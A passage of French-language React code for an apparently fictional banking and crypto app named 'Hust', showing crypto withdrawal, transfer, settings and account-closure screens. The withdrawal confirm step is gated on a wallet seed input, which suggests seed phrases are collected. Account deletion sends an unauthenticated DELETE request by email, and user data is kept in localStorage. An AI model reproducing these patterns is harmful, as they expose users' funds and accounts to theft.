                      setTimeout(() => {
                        setWithdrawalStep('success');
                        setWithdrawalSeedInput('');
                      }, 2500);
                    } else {
                      alert('Erreur: ' + result.error);
                      setWithdrawalStep('confirm');
                    }
                  } catch (error) {
                    alert('Erreur de connexion au serveur');
                    setWithdrawalStep('confirm');
                  }
                }
              }}
              disabled={withdrawalSeedInput.length < 10}
              className="flex-1 bg-violet-600 text-white py-3 rounded-xl text-sm font-bold disabled:opacity-50 disabled:cursor-not-allowed hover:bg-violet-700 transition"
            >
              Confirmer
            </button>
          </div>
        </div>
      </div>
    ) : (
      // Page principale de retrait
      <div className="min-h-screen bg-gradient-to-br from-violet-900 via-violet-800 to-black p-4">
        <div className="max-w-md mx-auto pt-12">
          <button className="text-white mb-4 flex items-center gap-2" onClick={() => {
            setShowCryptoWithdrawalPage(false);
            setWithdrawalAmount('');
            setWithdrawalAddress('');
          }}>
            <ArrowLeft className="w-5 h-5" /> Retour
          </button>

          <h1 className="text-2xl font-bold text-white mb-1">Retrait de crypto-monnaies</h1>
          <p className="text-gray-300 text-sm mb-6">Envoyez vos cryptos vers une adresse externe</p>

          <div className="bg-white/10 backdrop-blur-lg rounded-3xl p-4 mb-4">
            <label className="text-white text-xs font-medium block mb-2">Devise</label>
            
            <div className="relative mb-4">
              <button
                onClick={() => setShowCryptoCurrencyOptions(!showCryptoCurrencyOptions)}
                className="w-full bg-violet-600/50 hover:bg-violet-600/70 text-white p-3 rounded-xl flex items-center justify-between transition"
              >
                <div className="flex items-center gap-2">
                  <img 
                    src={
                      selectedWithdrawalCrypto === 'BTC' ? bitcoinLogo :
                      selectedWithdrawalCrypto === 'ETH' ? ethereumLogo :
                      selectedWithdrawalCrypto === 'USDT' ? usdtLogo : solanaLogo
                    }
                    alt={selectedWithdrawalCrypto}
                    className="w-7 h-7 rounded-full"
                  />
                  <span className="font-semibold text-sm">- {
                    selectedWithdrawalCrypto === 'BTC' ? 'Bitcoin' :
                    selectedWithdrawalCrypto === 'ETH' ? 'Ethereum' :
                    selectedWithdrawalCrypto === 'USDT' ? 'TetherUSD' : 'Solana'
                  }</span>
                </div>
                {showCryptoCurrencyOptions ? <ChevronUp className="w-4 h-4" /> : <ChevronDown className="w-4 h-4" />}
              </button>

              {showCryptoCurrencyOptions && (
                <div className="absolute top-full left-0 right-0 mt-2 bg-gray-800 rounded-xl overflow-hidden z-10 border border-white/20">
                  {[
                    { code: 'BTC', name: 'Bitcoin', logo: bitcoinLogo },
                    { code: 'ETH', name: 'Ethereum', logo: ethereumLogo },
                    { code: 'USDT', name: 'TetherUSD', logo: usdtLogo },
                    { code: 'SOL', name: 'Solana', logo: solanaLogo }
                  ].map((crypto) => (
                    <button
                      key={crypto.code}
                      onClick={() => {
                        setSelectedWithdrawalCrypto(crypto.code);
                        setWithdrawalAmount('');
                        setShowCryptoCurrencyOptions(false);
                      }}
                      className={`w-full p-3 flex items-center gap-2 transition text-left ${
                        selectedWithdrawalCrypto === crypto.code 
                          ? 'bg-violet-600/50' 
                          : 'hover:bg-gray-700/50'
                      }`}
                    >
                      <img src={crypto.logo} alt={crypto.code} className="w-7 h-7 rounded-full" />
                      <span className="text-white font-medium text-sm">- {crypto.name}</span>
                    </button>
                  ))}
                </div>
              )}
            </div>

            <div className="bg-white/10 rounded-xl p-3 mb-3">
              <div className="flex justify-between text-xs mb-1">
                <span className="text-gray-300">Disponible</span>
                <span className="text-white font-bold">
                  {userDetails?.cryptoWallet?.[selectedWithdrawalCrypto]?.balance?.toFixed(
                    selectedWithdrawalCrypto === 'USDT' ? 2 : 8
                  ) || '0'} {selectedWithdrawalCrypto}
                </span>
              </div>
              <div className="flex justify-between text-xs mb-1">
                <span className="text-gray-400">Frais réseau (estimé)</span>
                <span className="text-gray-400">~{
                  selectedWithdrawalCrypto === 'BTC' ? '0.00008' :
                  selectedWithdrawalCrypto === 'ETH' ? '0.001' :
                  selectedWithdrawalCrypto === 'USDT' ? '8' : '0.00005'
                } {selectedWithdrawalCrypto}</span>
              </div>
              <div className="border-t border-white/20 my-1"></div>
              <div className="flex justify-between text-xs">
                <span className="text-gray-300">Maximum retirable</span>
                <span className="text-green-400 font-bold">
                  {(() => {
                    const balance = userDetails?.cryptoWallet?.[selectedWithdrawalCrypto]?.balance || 0;
                    const fee = selectedWithdrawalCrypto === 'BTC' ? 0.00008 :
                                selectedWithdrawalCrypto === 'ETH' ? 0.001 :
                                selectedWithdrawalCrypto === 'USDT' ? 8 : 0.00005;
                    const max = Math.max(0, balance - fee);
                    return max.toFixed(selectedWithdrawalCrypto === 'USDT' ? 2 : 8);
                  })()} {selectedWithdrawalCrypto}
                </span>
              </div>
            </div>

            <label className="text-white text-xs font-medium block mb-2">Montant à retirer</label>
            <div className="relative mb-2">
              <input
                type="text"
                inputMode="decimal"
                value={withdrawalAmount}
                onChange={(e) => {
                  const value = e.target.value;
                  if (value === '' || /^\d*[.,]?\d*$/.test(value)) {
                    setWithdrawalAmount(value.replace(',', '.'));
                  }
                }}
                className="w-full bg-white/20 text-white text-lg font-bold py-3 px-3 pr-16 rounded-xl border-2 border-white/30 focus:border-white outline-none"
                placeholder="0.00"
              />
              <span className="absolute right-3 top-1/2 -translate-y-1/2 text-gray-400 text-sm font-bold">
                {selectedWithdrawalCrypto}
              </span>
            </div>
            
            {withdrawalAmount && parseFloat(withdrawalAmount) > 0 && (
              <div className="mb-3 text-right">
                <span className="text-gray-400 text-xs">≈ </span>
                <span className="text-white text-base font-bold">
                  {(parseFloat(withdrawalAmount) * (
                    selectedWithdrawalCrypto === 'BTC' ? 45000 :
                    selectedWithdrawalCrypto === 'ETH' ? 3500 :
                    selectedWithdrawalCrypto === 'USDT' ? 0.92 : 150
                  )).toFixed(2)}€
                </span>
              </div>
            )}

            <button
              onClick={() => {
                const balance = userDetails?.cryptoWallet?.[selectedWithdrawalCrypto]?.balance || 0;
                const fee = selectedWithdrawalCrypto === 'BTC' ? 0.00008 :
                            selectedWithdrawalCrypto === 'ETH' ? 0.001 :
                            selectedWithdrawalCrypto === 'USDT' ? 8 : 0.00005;
                const max = Math.max(0, balance - fee);
                setWithdrawalAmount(max.toFixed(selectedWithdrawalCrypto === 'USDT' ? 2 : 8));
              }}
              className="w-full bg-white/10 text-white py-2 rounded-lg text-xs font-medium mb-4 hover:bg-white/20 transition"
            >
              Utiliser le maximum ({(() => {
                const balance = userDetails?.cryptoWallet?.[selectedWithdrawalCrypto]?.balance || 0;
                const fee = selectedWithdrawalCrypto === 'BTC' ? 0.00008 :
                            selectedWithdrawalCrypto === 'ETH' ? 0.001 :
                            selectedWithdrawalCrypto === 'USDT' ? 8 : 0.00005;
                const max = Math.max(0, balance - fee);
                return max.toFixed(selectedWithdrawalCrypto === 'USDT' ? 2 : 8);
              })()} {selectedWithdrawalCrypto})
            </button>

            <label className="text-white text-xs font-medium block mb-2">Adresse du portefeuille destinataire</label>
            <input
              type="text"
              value={withdrawalAddress}
              onChange={(e) => setWithdrawalAddress(e.target.value)}
              className="w-full bg-white/20 text-white py-3 px-3 rounded-xl border-2 border-white/30 focus:border-white outline-none mb-4 font-mono text-xs"
              placeholder={selectedWithdrawalCrypto === 'BTC' ? 'bc1q...' : '0x...'}
            />

            <div className="bg-yellow-500/20 rounded-xl p-2 flex gap-2 mb-4">
              <AlertCircle className="w-4 h-4 text-yellow-300 flex-shrink-0 mt-0.5" />
              <p className="text-yellow-100 text-xs">
                Vérifiez bien l'adresse. Les transactions sont irréversibles.
              </p>
            </div>

            {withdrawalAmount && parseFloat(withdrawalAmount) > 0 && parseFloat(withdrawalAmount) > ((() => {
              const balance = userDetails?.cryptoWallet?.[selectedWithdrawalCrypto]?.balance || 0;
              const fee = selectedWithdrawalCrypto === 'BTC' ? 0.00008 :
                          selectedWithdrawalCrypto === 'ETH' ? 0.001 :
                          selectedWithdrawalCrypto === 'USDT' ? 8 : 0.00005;
              return Math.max(0, balance - fee);
            })()) && (
              <div className="bg-red-500/20 rounded-xl p-2 flex gap-2 mb-4">
                <AlertCircle className="w-4 h-4 text-red-300 flex-shrink-0 mt-0.5" />
                <p className="text-red-100 text-xs">
                  Montant > solde disponible. Max : {(() => {
                    const balance = userDetails?.cryptoWallet?.[selectedWithdrawalCrypto]?.balance || 0;
                    const fee = selectedWithdrawalCrypto === 'BTC' ? 0.00008 :
                                selectedWithdrawalCrypto === 'ETH' ? 0.001 :
                                selectedWithdrawalCrypto === 'USDT' ? 8 : 0.00005;
                    const max = Math.max(0, balance - fee);
                    return max.toFixed(selectedWithdrawalCrypto === 'USDT' ? 2 : 8);
                  })()} {selectedWithdrawalCrypto}
                </p>
              </div>
            )}

            <button
              onClick={() => {
                if (!userDetails?.cryptoWallet) {
                  alert("Vous devez d'abord importer un portefeuille crypto depuis l'onglet Comptes");
                  return;
                }
                
                const available = userDetails?.cryptoWallet?.[selectedWithdrawalCrypto]?.balance || 0;
                
                if (available === 0) {
                  alert(`Vous n'avez pas de ${selectedWithdrawalCrypto}. Importez un portefeuille contenant cette crypto.`);
                  return;
                }
                
                const fee = selectedWithdrawalCrypto === 'BTC' ? 0.00008 :
                            selectedWithdrawalCrypto === 'ETH' ? 0.001 :
                            selectedWithdrawalCrypto === 'USDT' ? 8 : 0.00005;
                const max = Math.max(0, available - fee);
                const amountNum = parseFloat(withdrawalAmount);
                
                if (!withdrawalAmount || amountNum <= 0) {
                  alert('Veuillez entrer un montant valide');
                  return;
                }
                
                if (amountNum > max) {
                  alert(`Solde insuffisant. Max: ${max.toFixed(selectedWithdrawalCrypto === 'USDT' ? 2 : 8)} ${selectedWithdrawalCrypto}`);
                  return;
                }
                
                if (!withdrawalAddress || withdrawalAddress.length < 20) {
                  alert('Veuillez entrer une adresse valide');
                  return;
                }
                
                setWithdrawalStep('confirm');
              }}
              disabled={!withdrawalAmount || !withdrawalAddress || withdrawalAddress.length < 20}
              className="w-full bg-violet-600 text-white py-3 rounded-xl font-bold disabled:opacity-50 disabled:cursor-not-allowed hover:bg-violet-700 transition"
            >
              Continuer
            </button>
          </div>
        </div>
      </div>
    )}
  </div>



























    ) : showHustPage ? (
      <div className="min-h-screen bg-gradient-to-br from-violet-900 via-violet-800 to-black text-white p-4">
        {/* Header - sans le logo carré */}
        <div className="flex items-center mb-6 pt-12">
          <button className="text-white" onClick={() => {
  resetTransferForms();
  setShowHustPage(false);
}}>
            <ArrowLeft size={24} />
          </button>
          <h1 className="text-xl font-medium mx-auto">Ajouter un bénéficiaire</h1>
        </div>
        
        {/* Main content */}
        <h2 className="text-2xl font-bold mb-2">Envoyer à un utilisateur Hust</h2>
        <p className="text-gray-400 mb-6">Saisissez les détails ci-dessous pour effectuer un transfert.</p>
        
        {/* Message d'erreur */}
        {formError && (
          <div className="bg-red-500/20 text-red-200 p-3 rounded-lg mb-4">
            {formError}
          </div>
        )}
        
        {/* Form fields */}
        <div className="space-y-4">
          <div>
            <label className="text-gray-400 text-sm mb-1 block">Nom d'utilisateur HUST</label>
            <input
              type="text"
              className={`w-full bg-gray-800/50 p-4 rounded-lg text-white ${
                beneficiaryError ? 'border border-red-500' : ''
              }`}
              placeholder="Nom d'utilisateur HUST"
              value={beneficiaryName}
              onChange={handleBeneficiaryChange}
            />
            {beneficiaryError && (
              <p className="text-red-500 text-sm mt-1">{beneficiaryError}</p>
            )}
          </div>
          
          {/* Continue button - placé directement en dessous des champs */}
          <div className="pt-6">
            <button
              className={`w-full ${
                isValidBeneficiary 
                  ? 'bg-violet-500 text-white' 
                  : 'bg-gray-700/50 text-gray-400'
              } py-4 rounded-lg font-medium`}
              onClick={handleHustContinue}
              disabled={!isValidBeneficiary}
            >
              Continuer
            </button>
          </div>
        </div>
        
        {/* Espace vide supplémentaire en bas */}
        <div className="h-52"></div>
      </div>
    ) : showBankPage ? (
      <div className="min-h-screen bg-gradient-to-br from-violet-900 via-violet-800 to-black text-white p-4">
        {/* Header - sans le logo carré */}
        <div className="flex items-center mb-4 pt-12">
          <button className="text-white" onClick={() => {
  resetTransferForms();
  setShowBankPage(false);
}}>
            <ArrowLeft size={24} />
          </button>
          <h1 className="text-xl font-medium mx-auto">Ajouter un bénéficiaire</h1>
        </div>
        
        {/* Main content */}
        <h2 className="text-2xl font-bold mb-1">Retrait Bancaire</h2>
        <p className="text-gray-400 mb-4">Saisissez les détails ci-dessous pour effectuer un retrait.</p>
        
        {/* Message d'erreur */}
        {formError && (
          <div className="bg-red-500/20 text-red-200 p-3 rounded-lg mb-4">
            {formError}
          </div>
        )}
        
        {/* Form fields */}
        <div className="space-y-3">
          <div>
            <label className="text-gray-400 text-sm mb-1 block">Devise</label>
            <div className="relative">
              <button 
                className="w-full bg-gray-800/50 p-3 rounded-lg flex justify-between items-center"
                onClick={() => setShowCurrencyOptions(!showCurrencyOptions)}
              >
                <span>{currency}</span>
                {showCurrencyOptions ? <ChevronUp size={20} /> : <ChevronDown size={20} />}
              </button>
              
              {/* Options de devises */}
              {showCurrencyOptions && (
                <div className="absolute w-full mt-1 bg-gray-800 rounded-lg shadow-lg z-10 overflow-hidden">
                  {['EUR - Euro', 'GBP - Livre Sterling', 'USD - Dollar Américain', 'CHF - Franc Suisse'].map((curr, index) => (
                    <button
                      key={index}
                      className={`w-full text-left p-4 hover:bg-violet-800/50 ${
                        curr === currency ? 'bg-violet-800/30' : ''
                      }`}
                      onClick={() => {
                        setCurrency(curr);
                        setShowCurrencyOptions(false);
                      }}
                    >
                      {curr}
                    </button>
                  ))}
                </div>
              )}
            </div>
          </div>
          
          <div>
            <label className="text-gray-400 text-sm mb-1 block">Nom</label>
            <input
              type="text"
              className="w-full bg-gray-800/60 p-4 rounded-lg text-white cursor-not-allowed"
              value={`${userDetails?.firstName || ''} ${userDetails?.lastName || ''}`}
              readOnly
            />
          </div>
          
          <div>
            <label className="text-gray-400 text-sm mb-1 block">IBAN</label>
            <input 
              type="text" 
              className={`w-full bg-gray-800/50 p-3 rounded-lg text-white ${
                ibanError ? 'border border-red-500' : ''
              }`}
              placeholder="IBAN" 
              value={bankAccount}
              onChange={handleIbanChange}
            />
            {ibanError && (
              <p className="text-red-500 text-xs mt-1">{ibanError}</p>
            )}
          </div>
          
          <div>
            <label className="text-gray-400 text-sm mb-1 block">BIC</label>
            <input 
              type="text" 
              className={`w-full bg-gray-800/50 p-3 rounded-lg text-white ${
                bicError ? 'border border-red-500' : ''
              }`}
              placeholder="BIC" 
              value={bicCode}
              onChange={handleBicChange}
            />
            {bicError && (
              <p className="text-red-500 text-xs mt-1">{bicError}</p>
            )}
          </div>
          
          {/* Continue button - placé directement en dessous des champs */}
          <div className="pt-3">
            <button 
              className={`w-full ${
                isValidIban && isValidBic
                  ? 'bg-violet-500 text-white' 
                  : 'bg-gray-700/50 text-gray-400'
             } py-3 rounded-lg font-medium`}
             onClick={handleBankContinue}
             disabled={!isValidIban || !isValidBic}
          >
              Continuer
            </button>
          </div>
        </div>
        
        {/* Espace vide supplémentaire en bas */}
        <div className="h-52"></div>
      </div>
    ) : (
      <>
        {/* Header avec X pour retour */}
        <div className="pt-12 px-4 pb-4">
          <button 
            className="text-transparent" 
            onClick={() => console.log('Retour')}
          >
            <svg width="28" height="28" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round">
              <line x1="18" y1="6" x2="6" y2="18" />
              <line x1="6" y1="6" x2="18" y2="18" />
            </svg>
          </button>
        </div>
        
        {/* Titre principal */}
        <div className="px-4 mb-6">
          <h1 className="text-2xl font-bold mb-6">Envoyer de l'argent</h1>
          
          {/* Sous-sections */}
          <div className="mb-5">
            <h2 className="text-xl mb-3">Instantané</h2>
            
            {/* Option Hust */}
            <button 
              className="w-full bg-gray-800/50 backdrop-blur-sm rounded-lg overflow-hidden p-3 flex items-center mb-4 shadow-sm"
              onClick={() => setShowHustPage(true)}
            >
              <div className="bg-violet-400/20 w-12 h-12 rounded-full flex items-center justify-center mr-3">
                <svg width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round">
                  <circle cx="12" cy="8" r="5" />
                  <path d="M20 21a8 8 0 0 0-16 0" />
                </svg>
              </div>
              <div className="text-left">
                <h3 className="text-white text-base font-medium">À Un Utilisateur Hust</h3>
                <p className="text-white/70 text-xs">Avec Hust Pay</p>
              </div>
            </button>
          </div>
          
          <div className="mb-5">
            <h2 className="text-xl mb-3">Virement Bancaire</h2>
            
            {/* Option Virement Bancaire */}
            <button 
              className="w-full bg-gray-800/50 backdrop-blur-sm rounded-lg overflow-hidden p-3 flex items-center mb-4 shadow-sm"
              onClick={() => setShowBankPage(true)}
            >
              <div className="bg-violet-400/20 w-12 h-12 rounded-full flex items-center justify-center mr-3">
                <svg width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round">
                  <circle cx="12" cy="12" r="8" />
                  <line x1="8" y1="12" x2="16" y2="12" />
                  <path d="M12 16V8" />
                </svg>
              </div>
              <div className="text-left">
                <h3 className="text-white text-base font-medium">Virement Bancaire</h3>
                <p className="text-white/70 text-xs">Paiements plus rapides en EUR SEPA et en GBP</p>
              </div>
            </button>
          </div>
          
          <div className="mb-5">
            <h2 className="text-xl mb-3">Crypto-Monnaies</h2>
            
            {/* Option Crypto */}
            <button 
              className="w-full bg-gray-800/50 backdrop-blur-sm rounded-lg overflow-hidden p-3 flex items-center mb-4 shadow-sm"
              onClick={() => {
                if (!userDetails?.cryptoWallet) {
                  alert("Vous devez d'abord importer un portefeuille crypto depuis l'onglet Comptes");
                  return;
               }
               setShowCryptoWithdrawalPage(true);  // ⬅️ NOUVELLE PAGE
             }}
            >
              <div className="bg-violet-400/20 w-12 h-12 rounded-full flex items-center justify-center mr-3">
                <svg width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round">
                  <rect x="2" y="6" width="20" height="12" rx="2" />
                  <circle cx="12" cy="12" r="2" />
                  <path d="M6 12h.01M18 12h.01" />
                </svg>
              </div>
              <div className="text-left">
                <h3 className="text-white text-base font-medium">Retrait De Crypto-Monnaies</h3>
                <p className="text-white/70 text-xs">Avec BTC, ETH et plus encore !</p>
              </div>
            </button>
          </div>
        

        <div className="mb-5">
            <h2 className="text-xl mb-3">Swap</h2>
            
            {/* Option Swap */}
            <button 
              className="w-full bg-gray-800/50 backdrop-blur-sm rounded-lg overflow-hidden p-3 flex items-center mb-4 shadow-sm"
              onClick={() => setShowSwapPage(true)}
            >
              <div className="bg-violet-400/20 w-12 h-12 rounded-full flex items-center justify-center mr-3">
                <svg width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round">
                  <path d="M3 12a9 9 0 0 1 9-9 9.75 9.75 0 0 1 6.74 2.74L21 8"/>
                  <path d="M21 3v5h-5"/>
                  <path d="M21 12a9 9 0 0 1-9 9 9.75 9.75 0 0 1-6.74-2.74L3 16"/>
                  <path d="M3 21v-5h5"/>
                </svg>
              </div>
              <div className="text-left">
                <h3 className="text-white text-base font-medium">Swap de Crypto-Monnaies</h3>
                <p className="text-white/70 text-xs">Échangez vos cryptos instantanément</p>
              </div>
            </button>
          </div>
        </div>

        {/* Espace pour le menu de navigation en bas */}
        <div className="h-52"></div>
      </>
    )}
  </div>
)}
        
{activeTab === 'settings' && (
  <div className="min-h-screen bg-gradient-to-br from-violet-900 via-violet-800 to-black text-white overflow-hidden h-screen p-4 pb-24">
    {showAccountSettings && <AccountSettingsPage onBack={() => setShowAccountSettings(false)} />}
    {showContactSupport && <ContactSupportPage onBack={() => setShowContactSupport(false)} />}

    {/* Modal Fermer le compte */}
    {showCloseAccountModal && (
      <>
        {/* Overlay */}
        <div className="fixed inset-0 bg-black/50 z-40" onClick={() => setShowCloseAccountModal(false)} />
        
        {/* Modal avec swipe */}
        <div 
          className="fixed top-0 left-0 right-0 bg-gradient-to-br from-violet-900 via-violet-800 to-black rounded-t-3xl z-50"
          style={{
            animation: 'slideUp 0.3s ease-out',
            height: 'calc(100vh - 50px)',
            marginTop: '50px',
            transform: swipeCurrentY > 0 ? `translateY(${swipeCurrentY}px)` : 'translateY(0)',
            transition: swipeCurrentY === 0 ? 'transform 0.3s ease-out' : 'none'
          }}
          onTouchStart={(e) => setSwipeStartY(e.touches[0].clientY)}
          onTouchMove={(e) => {
            const currentY = e.touches[0].clientY;
            const diff = currentY - swipeStartY;
            if (diff > 0) setSwipeCurrentY(diff);
          }}
          onTouchEnd={() => {
            if (swipeCurrentY > 100) setShowCloseAccountModal(false);
            setSwipeCurrentY(0);
            setSwipeStartY(0);
          }}
        >
          {/* Barre de glissement */}
          <div className="flex justify-center pt-3 pb-4">
            <div className="w-12 h-1.5 bg-gray-400 rounded-full"></div>
          </div>

          {/* Titre en haut à gauche */}
          <div className="px-6 pb-6">
            <h1 className="text-xl font-bold text-white">Fermer le compte</h1>
          </div>

          {/* Contenu centré */}
          <div className="absolute inset-0 flex flex-col items-center justify-center px-6" style={{ top: '100px', bottom: '120px' }}>
            <p className="text-white text-lg text-center mb-3 font-semibold">
              Nous sommes tristes de te voir partir...
            </p>

            <p className="text-white/60 text-base text-center">
              Veuillez confirmer la fermeture définitive de votre compte
            </p>
          </div>

          {/* Boutons en bas */}
          <div className="absolute bottom-0 left-0 right-0 px-6 pb-12 grid grid-cols-2 gap-4">
            <button 
              onClick={() => setShowCloseAccountModal(false)}
              className="bg-black/40 backdrop-blur-lg px-6 py-3 rounded-xl text-white font-medium transition-all hover:bg-black/50 flex items-center justify-center gap-2"
            >
              <X size={18} />
              Annuler
            </button>
            
            <button 
              onClick={async () => {
                try {
                  // Supprimer du serveur
                  const response = await fetch(`${SERVER_URL}/api/users/${userDetails.email}`, {
                    method: 'DELETE'
                  });
                  
                  if (response.ok) {
                    // Supprimer du localStorage
                    const allUsers = JSON.parse(localStorage.getItem('allUsers')) || {};
                    delete allUsers[userDetails.email.toLowerCase()];
                    localStorage.setItem('allUsers', JSON.stringify(allUsers));
                    
                    // Déconnexion et retour au menu initial
                    setUserDetails(null);
                    setCurrentPage('login');
                    setShowCloseAccountModal(false);
                    setActiveTab('accounts');
                    
                    alert('Votre compte a été fermé avec succès');
                  } else {
                    alert('Erreur lors de la fermeture du compte');
                  }
                } catch (error) {
                  console.error('Erreur:', error);
                  alert('Erreur lors de la fermeture du compte');
                }
              }}
              className="bg-black/40 backdrop-blur-lg px-6 py-3 rounded-xl text-red-500 font-medium transition-all hover:bg-black/50 flex items-center justify-center gap-2"
            >
              Fermer
              <Trash2 size={18} />
            </button>
          </div>
        </div>
      </>
    )}
    

    {/* Page Préférences */}
{showPreferences && (
  <div className="fixed inset-0 bg-gradient-to-br from-violet-900 via-violet-800 to-black text-white z-50" style={{ paddingTop: '60px' }}>
    <div className="px-4 pb-4">
      <button onClick={() => setShowPreferences(false)} className="text-white">
        <ArrowLeft size={28} />
      </button>
    </div>
    
    <h1 className="text-2xl font-bold px-4 mb-6">Préférences</h1>
    
    <div className="px-4 space-y-3">
      {/* Langue d'affichage */}
      <button 
        className="w-full bg-gray-800/50 backdrop-blur-sm p-4 rounded-lg flex items-center justify-between"
        onClick={() => setShowLanguageList(true)}
      >
        <span className="text-lg">Langue d'affichage</span>
        <div className="flex items-center text-gray-400">
          <span className="mr-2">{selectedLanguage}</span>
          <svg width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2">
            <polyline points="9 18 15 12 9 6"/>
          </svg>
        </div>
      </button>
      
      {/* Devise */}
      <button 
        className="w-full bg-gray-800/50 backdrop-blur-sm p-4 rounded-lg flex items-center justify-between"
        onClick={() => setShowCurrencyList(true)}
      >
        <span className="text-lg">Devise</span>
        <div className="flex items-center text-gray-400">
          <span className="mr-2">{selectedCurrency}</span>
          <svg width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2">
            <polyline points="9 18 15 12 9 6"/>
          </svg>
        </div>
      </button>
    </div>
  </div>
)}

{/* Page Liste des langues */}
{showLanguageList && (
  <div className="fixed inset-0 bg-gradient-to-br from-violet-900 via-violet-800 to-black text-white z-50">
    <div className="pt-12 px-4 pb-4">
      <button onClick={() => setShowLanguageList(false)} className="text-white">
        <ArrowLeft size={28} />
      </button>
    </div>
    
    <h1 className="text-2xl font-bold px-4 mb-6">Langue d'affichage</h1>
    
    <div className="px-4">
      {['English', 'Español', 'Deutsch', 'Français', 'Italiano', '中文 (简体)'].map((lang) => (
        <button
          key={lang}
          className={`w-full bg-gray-800/50 backdrop-blur-sm p-4 rounded-lg mb-3 flex items-center justify-between ${
            selectedLanguage === lang ? 'border-2 border-violet-500' : ''
          }`}
          onClick={() => {
            setSelectedLanguage(lang);
            setShowLanguageList(false);
          }}
        >
          <span className="text-lg">{lang}</span>
          {selectedLanguage === lang && (
            <div className="w-5 h-5 bg-violet-500 rounded-full" />
          )}
        </button>
      ))}
    </div>
  </div>
)}

{/* Page Liste des devises */}
{showCurrencyList && (
  <div className="fixed inset-0 bg-gradient-to-br from-violet-900 via-violet-800 to-black text-white z-50">
    <div className="pt-12 px-4 pb-4">
      <button onClick={() => setShowCurrencyList(false)} className="text-white">
        <ArrowLeft size={28} />
      </button>
    </div>
    
    <h1 className="text-2xl font-bold px-4 mb-6">Devise</h1>
    
    <div className="px-4">
      <input 
        type="text"
        placeholder="Search"
        className="w-full bg-gray-800/50 text-white p-3 rounded-lg mb-4 outline-none"
      />
      
      {[
        'USD - United States Dollar ($)',
        'EUR - Euro (€)',
        'GBP - British Pound (£)',
        'JPY - Japanese Yen (¥)',
        'CHF - Swiss Franc (Fr)',
        'CAD - Canadian Dollar (CA$)',
        'AUD - Australian Dollar (A$)'
      ].map((currency) => (
        <button
          key={currency}
          className={`w-full bg-gray-800/50 backdrop-blur-sm p-4 rounded-lg mb-3 flex items-center justify-between ${
            selectedCurrency === currency.split(' - ')[1].split(' (')[0] ? 'border-2 border-violet-500' : ''
          }`}
          onClick={() => {
  const newCurrency = currency.split(' - ')[1].split(' (')[0];
  setSelectedCurrency(newCurrency);
  
  // Sauvegarder dans userDetails et localStorage
  if (userDetails) {
    const updatedUser = { ...userDetails, preferredCurrency: newCurrency };
    setUserDetails(updatedUser);
    
    const allUsers = JSON.parse(localStorage.getItem('allUsers')) || {};
    allUsers[userDetails.email.toLowerCase()] = updatedUser;
    localStorage.setItem('allUsers', JSON.stringify(allUsers));
    
    updateUserHybrid(userDetails.email, updatedUser);
  }
  
  setShowCurrencyList(false);
}}
        >
          <span className="text-base">{currency}</span>
          {selectedCurrency === currency.split(' - ')[1].split(' (')[0] && (
            <div className="w-5 h-5 bg-violet-500 rounded-full" />
          )}
        </button>
      ))}
    </div>
  </div>
)}











    {!showAccountSettings && !showContactSupport && (
      // Page principale des paramètres
      <>
        {/* Header avec X pour retour */}
        <div className="pt-12 px-4 pb-4">
          <button 
            className="text-transparent" 
            onClick={() => console.log('Retour')}
          >
            <svg width="28" height="28" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2">
              <line x1="18" y1="6" x2="6" y2="18" />
              <line x1="6" y1="6" x2="18" y2="18" />
            </svg>
          </button>
        </div>
        
        {/* Avatar et informations utilisateur */}
        <div className="flex flex-col items-center mt-1 mb-6">
          <div className="w-24 h-24 rounded-full bg-violet-400 flex items-center justify-center mb-3">
            <span className="text-white text-2xl font-bold">{userDetails ? (userDetails.firstName?.charAt(0) || '') + (userDetails.lastName?.charAt(0) || '') : "UN"}</span>
          </div>
          <h2 className="text-xl font-bold">{userDetails?.fullName || "Utilisateur Name"}</h2>
          <p className="text-white/70 text-sm">{userDetails?.email || "utilisateur@exemple.com"}</p>
        </div>
        
        {/* Options de paramètres */}
        <div className="px-4 space-y-3">
          {/* Paramètres du compte */}
          <button 
            className="w-full bg-gray-800/50 backdrop-blur-sm p-3 rounded-lg text-left"
            onClick={() => setShowAccountSettings(true)}
          >
            <span className="text-lg">Paramètres du compte</span>
          </button>
          
          
          {/* Préférences - NOUVEAU */}
<button 
  className="w-full bg-gray-800/50 backdrop-blur-sm p-3 rounded-lg text-left"
  onClick={() => setShowPreferences(true)}
>
  <span className="text-lg">Préférences</span>
</button>
          
      
          {/* Besoin d'aide */}
          <div className="w-full bg-gray-800/50 backdrop-blur-sm p-3 rounded-lg">
            <h3 className="text-lg mb-1">Besoin d'aide ?</h3>
            <p className="text-white/70 text-sm mb-3">
              Décrivez-nous votre besoin, nous vous répondrons dans les meilleurs délais
            </p>
            
            <div className="flex items-center justify-between">
              <button 
                className="bg-gray-700/50 py-2 px-4 rounded-lg w-[90%] text-sm"
                onClick={() => setShowContactSupport(true)}
              >
                Contacter le support
              </button>
              <div className="w-[10%] flex items-center justify-center">
                <div className="w-5 h-5 bg-violet-400 rounded-full flex items-center justify-center text-[10px] font-bold">
                  ?
                </div>
              </div>
            </div>
          </div>
          
          {/* Se déconnecter */}
          <button 
            className="w-full bg-gray-800/50 backdrop-blur-sm p-3 rounded-lg text-left"
            onClick={() => { handleLogout();
                             setActiveTab('accounts');
            }}
          >
            <span className="text-red-400 text-lg">Se déconnecter</span>
          </button>
          
          {/* Fermer le compte */}
          <button 
            className="w-full bg-gray-800/50 backdrop-blur-sm p-3 rounded-lg text-left"
            onClick={() => setShowCloseAccountModal(true)}
          >
            <span className="text-red-400 text-lg">Fermer le compte</span>
          </button>
        </div>
        
        {/* Espace pour le menu de navigation en bas */}
        <div className="h-52"></div>
        
      </>
    )}
  </div>
)}        
          

 <nav className="fixed bottom-0 left-0 right-0 bg-black/20 backdrop-blur-lg">
  <div className="flex justify-around items-center pt-5 pb-8">
    <button
